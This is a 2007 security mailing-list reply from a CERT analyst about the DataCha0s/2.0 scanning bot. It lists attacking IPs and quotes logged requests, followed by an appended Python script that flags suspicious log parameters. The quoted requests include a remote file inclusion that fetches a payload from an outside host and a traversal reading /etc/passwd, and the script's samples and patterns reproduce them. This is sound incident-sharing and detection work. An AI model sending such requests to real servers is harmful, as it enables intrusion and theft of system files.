[Dshield] DataCha0s/2.0?

Koen Van Impe koen.vanimpe at belnet.be
Thu Apr 26 11:51:31 GMT 2007


Ryan McConigley wrote:
> Hi, I'm just curious, but has anyone else noticed a sudden rush of
> attempted web exploits from a script/bot that identifies itself as
> DataCha0s/2.0?
> 

Yes.

It looks like a bot that scans for vulnerable Perl AWStats installs
(throw DataCha0s in Google and you'll get a number of interesting hits).

We see similar attempts coming from 133.3.8.135, 217.174.240.113,
72.2.4.176, 203.89.187.231, 217.160.246.125
with requests like this:

[23/Apr/2007:05:26:32 +0200] "GET /index.php?module=http://www.regimesyndicate.org/powned.txt? HTTP/1.0" 200 2306 "-" "DataCha0s/2.0"
or
[26/Apr/2007:02:58:28 +0200] "GET /index.php?module=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 500 534 "-" "DataCha0s/2.0"


-- 
Koen Van Impe - BELNET CERT
koen.vanimpe at belnet.be
PGP Key Id 0xED12AD79
Contact: http://cert.belnet.be/
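
Added example, not part of the original post: a small triage script for access-log lines in the trimmed format quoted above. It flags query parameters that carry a remote URL, a directory traversal or a null byte. The sample lines, the example.org host and the `review` flag (a 2xx reply to a flagged request, a triage hint only) are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Trimmed log format as quoted in the post:
# [timestamp] "METHOD target PROTO" status bytes "referer" "user-agent"
LINE_RE = re.compile(
    r'\[(?P<ts>[^\]]+)\]\s+"(?P<method>[A-Z]+)\s+(?P<target>\S+)\s+HTTP/[\d.]+"\s+'
    r'(?P<status>\d{3})\s+(?P<size>\d+|-)\s+"(?P<referer>[^"]*)"\s+"(?P<ua>[^"]*)"'
)

# Constructed sample lines modelled on the requests in the post (not real log data).
SAMPLE = [
    '[23/Apr/2007:05:26:32 +0200] "GET /index.php?module=http://www.example.org/powned.txt? HTTP/1.0" 200 2306 "-" "DataCha0s/2.0"',
    '[26/Apr/2007:02:58:28 +0200] "GET /index.php?module=../../../../etc/passwd%00 HTTP/1.0" 500 534 "-" "DataCha0s/2.0"',
    '[26/Apr/2007:03:01:10 +0200] "GET /index.php?module=news HTTP/1.0" 200 4100 "-" "Mozilla/5.0"',
]


def classify(line):
    """Return a dict describing one log line, or None if it does not parse."""
    m = LINE_RE.search(line)
    if not m:
        return None
    findings = set()
    query = urlsplit(m["target"]).query
    for _name, value in parse_qsl(query, keep_blank_values=True):
        value = unquote(value)  # second decoding round catches double-encoded input
        if re.match(r"(?i)(https?|ftp)://", value):
            findings.add("remote-include")   # parameter value is a remote URL
        if re.search(r"\.\.[/\\]", value):
            findings.add("traversal")        # parameter value climbs directories
        if "\x00" in value:
            findings.add("null-byte")        # %00 used to cut off an appended suffix
    return {
        "ts": m["ts"],
        "status": int(m["status"]),
        "ua": m["ua"],
        "findings": sorted(findings),
        # A 2xx reply means the request was served, not rejected: check that host first.
        "review": bool(findings) and m["status"].startswith("2"),
    }


if __name__ == "__main__":
    for entry in SAMPLE:
        print(classify(entry))
```

Matching on the parameter content rather than on the DataCha0s user agent keeps the check useful when the client string changes.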
